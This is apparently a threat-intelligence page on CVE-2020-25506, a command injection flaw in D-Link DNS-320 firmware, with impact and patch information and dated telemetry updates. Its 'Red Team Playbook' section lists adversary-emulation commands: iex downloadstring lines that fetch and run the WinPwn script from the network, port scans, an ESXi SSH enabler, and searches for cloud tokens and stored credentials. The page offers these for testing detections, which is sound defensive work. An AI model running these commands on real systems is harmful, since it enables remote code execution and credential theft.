CVE-2020-25506
Overview
This vulnerability is a command injection flaw caused by improper input validation in the system_mgr.cgi component of D-Link DNS-320 firmware version 2.06B01 Revision Ax. The root cause lies in the unsanitized handling of user-supplied parameters within the CGI script, allowing shell commands to be injected and executed on the device's operating system level. The affected component processes HTTP POST requests, specifically targeting the system management interface.
Vulnerability Description
D-Link DNS-320 FW v2.06B01 Revision Ax is affected by command injection in the system_mgr.cgi component, which can lead to remote arbitrary code execution.
Impact
An unauthenticated attacker can execute arbitrary system commands remotely on the affected device, gaining full control over it. This enables compromise of device integrity, potential access to sensitive network data, and the ability to deploy malware or pivot within the internal network. No user interaction or credentials are required to exploit this vulnerability, allowing immediate and complete system compromise upon successful exploitation.
Solution
D-Link has issued a security bulletin addressing this vulnerability and recommends upgrading the DNS-320 firmware to a patched version beyond 2.06B01. Refer to the official advisory SAP10183 available at https://supportannouncement.us.dlink.com/announcement/publication.aspx?name=SAP10183 for detailed patch instructions and firmware downloads. Users should apply the vendor-provided firmware update promptly to mitigate this issue.
EPSS vs KEV Prediction — Evolution (30 days)
Full Analysis
The vulnerability present in the D-Link DNS-320 firmware version 2.06B01 Revision Ax is characterized by a command injection flaw within the system_mgr.cgi component. This weakness allows an attacker to execute arbitrary commands on the affected device with the privileges of the web server process. The root cause of this vulnerability lies in insufficient input validation, which permits malicious input to be processed without adequate sanitization. Attackers can exploit this flaw by crafting specially designed requests that include malicious commands, leading to unauthorized access and control over the device.
Exploitation of this vulnerability can occur through various attack vectors, primarily via the web interface of the affected device. An attacker could leverage social engineering techniques to trick a user into visiting a malicious link or directly target the device if it is exposed to the internet. Once the attacker gains access, they can execute arbitrary commands, which may include installing malware, creating backdoors, or altering device configurations. The ease of exploitation, combined with the potential for remote code execution, makes this vulnerability particularly dangerous, as it requires minimal technical skill to execute a successful attack.
The real-world impact of this vulnerability is significant, especially for organizations that rely on D-Link DNS-320 devices for data storage and management. If exploited, attackers could gain unauthorized access to sensitive data stored on the device, leading to data breaches, loss of confidentiality, and potential regulatory repercussions. Furthermore, the ability to execute arbitrary code could allow attackers to pivot to other systems within the network, escalating their access and causing further damage. The business risks associated with such incidents include financial losses, reputational damage, and the potential for legal liabilities resulting from compromised data.
To detect and mitigate the risks associated with this vulnerability, organizations should implement a multi-layered security approach. Regularly updating firmware to the latest versions is crucial, as vendors often release patches to address known vulnerabilities. Additionally, organizations should employ network segmentation to limit exposure of critical devices to the internet and implement strict firewall rules to control incoming and outgoing traffic. Intrusion detection systems can also be deployed to monitor for unusual activity on the network, providing an additional layer of defense. Finally, educating users about the risks of social engineering and the importance of secure device configurations can help reduce the likelihood of successful exploitation.
In conclusion, the command injection vulnerability in the D-Link DNS-320 firmware poses a serious threat to both individual users and organizations. The potential for remote arbitrary code execution highlights the need for proactive security measures and vigilant monitoring. By understanding the technical details, attack vectors, real-world impacts, and effective mitigation strategies, stakeholders can better protect their systems and sensitive data from exploitation. Addressing such vulnerabilities is essential for maintaining the integrity and security of networked devices in an increasingly interconnected world.
CSURFACE threat intelligence has detected a marked escalation in activity related to CVE-2020-25506, with telemetry indicating a significant increase in exploit attempts targeting the D-Link DNS-320 firmware vulnerability. This change is underscored by the vulnerability’s recent inclusion in the CISA Known Exploited Vulnerabilities (KEV) catalog, reflecting heightened recognition of its operational risk within federal and critical infrastructure environments. Concurrently, the CVSS score has been updated to 9.8, confirming the critical severity of the flaw, while the Exploit Prediction Scoring System (EPSS) now assigns a high likelihood of exploitation, indicating that adversaries are increasingly prioritizing this vector. Although no new proof-of-concept exploits or ransomware affiliations have been reported, the convergence of these factors elevates the overall threat posture. For defenders, this means that the vulnerability is no longer theoretical but actively targeted in the wild, necessitating urgent attention to detection and response capabilities. The risk assessment shifts from a latent to an imminent threat, emphasizing the critical need for enhanced monitoring and rapid mitigation efforts to prevent compromise in affected environments.
Update 2 — June 07, 2026
CSURFACE threat intelligence has identified a slight increase in exploitation attempts targeting CVE-2020-25506, reflected by a modest uptick in telemetry detections. Although the EPSS score shows a marginal decline, the persistence of high exploitability underscores continued adversary interest in this critical vulnerability. The absence of new proof-of-concept exploits or ransomware affiliations suggests that threat actors remain focused on leveraging existing attack methods rather than developing novel techniques. For defenders, this subtle rise in activity signals that the vulnerability remains an active vector in the wild, maintaining its status as a high-risk target. Consequently, the threat level should be viewed as sustained rather than diminished, reinforcing the necessity for ongoing vigilance and monitoring within affected environments.
Update 3 — July 05, 2026
CSURFACE threat intelligence has identified a slight increase in detection activity related to CVE-2020-25506, indicating that adversaries continue to probe and exploit this critical command injection vulnerability in D-Link DNS-320 devices. While the uptick is modest, it reflects persistent attacker interest rather than a decline, underscoring the vulnerability’s ongoing relevance in threat actor toolkits. Our telemetry shows no emergence of new exploit variants or ransomware affiliations, suggesting that threat actors rely on established exploitation methods. This sustained activity, coupled with a high EPSS score remaining near the maximum percentile, confirms that the risk associated with this vulnerability remains elevated. Defenders should interpret this as a signal that the threat landscape for CVE-2020-25506 is stable but active, warranting continued monitoring to detect potential shifts in adversary tactics or increased exploitation attempts.
Affected Products (1)
| Vendor | Product | Version | CPE | |
|---|---|---|---|---|
|
|
Dlink | Dns-320 Firmware | 2.06b01 |
cpe:2.3:o:dlink:dns-320_firmware:2.06b01:*:*:*:*:*:*:*
|
Exploits
No exploits found for this CVE.
Threat Feed
31 eventsSighting activity recorded
Sighting activity recorded
Sighting activity recorded
Sighting activity recorded
Sighting activity recorded
Sighting activity recorded
Sighting activity recorded
Sighting activity recorded
Sighting activity recorded
Sighting activity recorded
Sighting activity recorded
Sighting activity recorded
Sighting activity recorded
Sighting activity recorded
Sighting activity recorded
Sighting activity recorded
Sighting activity recorded
Sighting activity recorded
Sighting activity recorded
Sighting activity recorded
Sighting activity recorded
Sighting activity recorded
Sighting activity recorded
Sighting activity recorded
Sighting activity recorded
Sighting activity recorded
Sighting activity recorded
Sighting activity recorded
Sighting activity recorded
Sighting activity recorded
CISA confirmed active exploitation — added to Known Exploited Vulnerabilities catalog
Likely Kill Chain
Typical exploitation path inferred from this vulnerability's characteristics — mapped to MITRE ATT&CK tactics.
Kill chain derived from the ML classifier.
Attack Vectors ML
MITRE ATT&CK Techniques (6)
The adversary's likely kill chain after exploiting this CVE — in execution order. Validate each stage with the Red Team Playbook below.
The techniques for this CVE don't apply to this operating system. Switch OS above.
CAPEC Attack Patterns ML
| ID | Name | ML Conf. | Likelihood | Severity | Link |
|---|---|---|---|---|---|
| CAPEC-88 | OS Command Injection |
55%
|
High | High | |
| CAPEC-6 | Argument Injection |
51%
|
High | High | |
| CAPEC-43 | Exploiting Multiple Input Interpretation Layers |
45%
|
Medium | High |
Red Team Playbook
33 AtomicRedTeam test(s) mapped to this CVE's kill chain. Use them to validate detections and controls.
AtomicRedTeam has no published tests for this CVE's techniques on this OS. Switch OS above to see other options.
Set-PowerCLIConfiguration -InvalidCertificateAction Ignore -ParticipateInCEIP:$false -Confirm:$false
Connect-VIServer -Server #{vm_host} -User #{vm_user} -Password #{vm_pass}
Get-VMHostService -VMHost #{vm_host} | Where-Object {$_.Key -eq "TSM-SSH" } | Start-VMHostService -Confirm:$false
echo "" | "#{plink_file}" -batch "#{vm_host}" -ssh -l #{vm_user} -pw "#{vm_pass}" "vim-cmd hostsvc/enable_ssh"
docker build -t t1046 $PathToAtomicsFolder/T1046/src/
docker run --name t1046_container --rm -d -t t1046
docker exec t1046_container /scan.sh
for port in {1..65535}; do (2>/dev/null echo >/dev/tcp/#{host}/$port) && echo port $port is open ; done
nmap #{host_to_scan}
sudo nmap -sS #{network_range} -p #{port}
telnet #{host} #{port}
nc -nv #{host} #{port}
nmap -Pn -sV -p #{port_range} #{host}
python "#{filename}" -i #{host_ip}
$ipAddr = "#{ip_address}"
if ($ipAddr -like "*,*") {
$ip_list = $ipAddr -split ","
$ip_list = $ip_list.ForEach({ $_.Trim() })
Write-Host "[i] IP Address List: $ip_list"
$ports = #{port_list}
foreach ($ip in $ip_list) {
foreach ($port in $ports) {
Write-Host "[i] Establishing connection to: $ip : $port"
try {
$tcp = New-Object Net.Sockets.TcpClient
$tcp.ConnectAsync($ip, $port).Wait(#{timeout_ms}) | Out-Null
} catch {}
if ($tcp.Connected) {
$tcp.Close()
Write-Host "Port $port is open on $ip"
}
}
}
} elseif ($ipAddr -notlike "*,*") {
if ($ipAddr -eq "") {
# Assumes the "primary" interface is shown at the top
$interface = Get-NetIPInterface -AddressFamily IPv4 -ConnectionState Connected | Select-Object -ExpandProperty InterfaceAlias -First 1
Write-Host "[i] Using Interface $interface"
$ipAddr = Get-NetIPAddress -AddressFamily IPv4 -InterfaceAlias $interface | Select-Object -ExpandProperty IPAddress
}
Write-Host "[i] Base IP-Address for Subnet: $ipAddr"
$subnetSubstring = $ipAddr.Substring(0, $ipAddr.LastIndexOf('.') + 1)
# Always assumes /24 subnet
Write-Host "[i] Assuming /24 subnet. scanning $subnetSubstring'1' to $subnetSubstring'254'"
$ports = #{port_list}
$subnetIPs = 1..254 | ForEach-Object { "$subnetSubstring$_" }
foreach ($ip in $subnetIPs) {
foreach ($port in $ports) {
try {
$tcp = New-Object Net.Sockets.TcpClient
$tcp.ConnectAsync($ip, $port).Wait(#{timeout_ms}) | Out-Null
} catch {}
if ($tcp.Connected) {
$tcp.Close()
Write-Host "Port $port is open on $ip"
}
}
}
} else {
Write-Host "[Error] Invalid Inputs"
exit 1
}
Get-Service -Name "Remote Desktop Services", "Remote Desktop Configuration"
iex(new-object net.webclient).downloadstring('https://raw.githubusercontent.com/S3cur3Th1sSh1t/WinPwn/121dcee26a7aca368821563cbe92b2b5638c5773/WinPwn.ps1')
MS17-10 -noninteractive -consoleoutput
iex(new-object net.webclient).downloadstring('https://raw.githubusercontent.com/S3cur3Th1sSh1t/WinPwn/121dcee26a7aca368821563cbe92b2b5638c5773/WinPwn.ps1')
bluekeep -noninteractive -consoleoutput
iex(new-object net.webclient).downloadstring('https://raw.githubusercontent.com/S3cur3Th1sSh1t/WinPwn/121dcee26a7aca368821563cbe92b2b5638c5773/WinPwn.ps1')
fruit -noninteractive -consoleoutput
iex(new-object net.webclient).downloadstring('https://raw.githubusercontent.com/S3cur3Th1sSh1t/WinPwn/121dcee26a7aca368821563cbe92b2b5638c5773/WinPwn.ps1')
spoolvulnscan -noninteractive -consoleoutput
Start-Process -FilePath "#{autoit_path}" -ArgumentList "#{script_path}"
echo "Creating %systemroot%\wpbbin.exe"
New-Item -ItemType File -Path "$env:SystemRoot\System32\wpbbin.exe"
type C:\Windows\Panther\unattend.xml
type C:\Windows\Panther\Unattend\unattend.xml
python2 laZagne.py all
grep -ri password #{file_path}
exit 0
findstr /si pass *.xml *.doc *.txt *.xls
ls -R | select-string -ErrorAction SilentlyContinue -Pattern password
find #{file_path}/.aws -name "credentials" -type f 2>/dev/null
find #{file_path}/.azure -name "msal_token_cache.json" -o -name "accessTokens.json" -type f 2>/dev/null
find #{file_path}/.config/gcloud -name "credentials.db" -o -name "access_tokens.db" -type f 2>/dev/null
find #{file_path}/.oci/sessions -name "token" -type f 2>/dev/null
for file in $(find #{file_path} -type f -name .netrc 2> /dev/null);do echo $file ; cat $file ; done
dir /a:h C:\Users\%USERNAME%\AppData\Local\Microsoft\Credentials\
dir /a:h C:\Users\%USERNAME%\AppData\Roaming\Microsoft\Credentials\
$usernameinfo = (Get-ChildItem Env:USERNAME).Value
Get-ChildItem -Hidden C:\Users\$usernameinfo\AppData\Roaming\Microsoft\Credentials\
Get-ChildItem -Hidden C:\Users\$usernameinfo\AppData\Local\Microsoft\Credentials\
iex(new-object net.webclient).downloadstring('https://raw.githubusercontent.com/S3cur3Th1sSh1t/WinPwn/121dcee26a7aca368821563cbe92b2b5638c5773/WinPwn.ps1')
SharpCloud -consoleoutput -noninteractive
iex(new-object net.webclient).downloadstring('https://raw.githubusercontent.com/S3cur3Th1sSh1t/WinPwn/121dcee26a7aca368821563cbe92b2b5638c5773/WinPwn.ps1')
sessionGopher -noninteractive -consoleoutput
iex(new-object net.webclient).downloadstring('https://raw.githubusercontent.com/S3cur3Th1sSh1t/WinPwn/121dcee26a7aca368821563cbe92b2b5638c5773/WinPwn.ps1')
Snaffler -noninteractive -consoleoutput
iex(new-object net.webclient).downloadstring('https://raw.githubusercontent.com/S3cur3Th1sSh1t/WinPwn/121dcee26a7aca368821563cbe92b2b5638c5773/WinPwn.ps1')
passhunt -local $true -noninteractive
iex(new-object net.webclient).downloadstring('https://raw.githubusercontent.com/S3cur3Th1sSh1t/WinPwn/121dcee26a7aca368821563cbe92b2b5638c5773/WinPwn.ps1')
powershellsensitive -consoleoutput -noninteractive
iex(new-object net.webclient).downloadstring('https://raw.githubusercontent.com/S3cur3Th1sSh1t/WinPwn/121dcee26a7aca368821563cbe92b2b5638c5773/WinPwn.ps1')
sensitivefiles -noninteractive -consoleoutput
Detection & Response Rules
No detection or response rules found for this CVE.
No news articles found for this CVE.
References (5)
| Title | Tags | URL |
|---|---|---|
| nvd.nist.gov |
NVD
reference
|
https://nvd.nist.gov/vuln/detail/CVE-2020-25506 |
| dlink.com |
GitHub CVE
x_refsource_MISC
|
https://www.dlink.com/en/security-bulletin/ |
| supportannouncement.us.dlink.com |
GitHub CVE
x_refsource_MISC
|
https://supportannouncement.us.dlink.com/announcement/publication.aspx?name=SAP10183 |
| gist.github.com |
GitHub CVE
x_refsource_MISC
|
https://gist.github.com/WinMin/6f63fd1ae95977e0e2d49bd4b5f00675 |
| cisa.gov |
NVD API
US Government Resource
|
https://www.cisa.gov/known-exploited-vulnerabilities-catalog?field_cve=CVE-2020-25506 |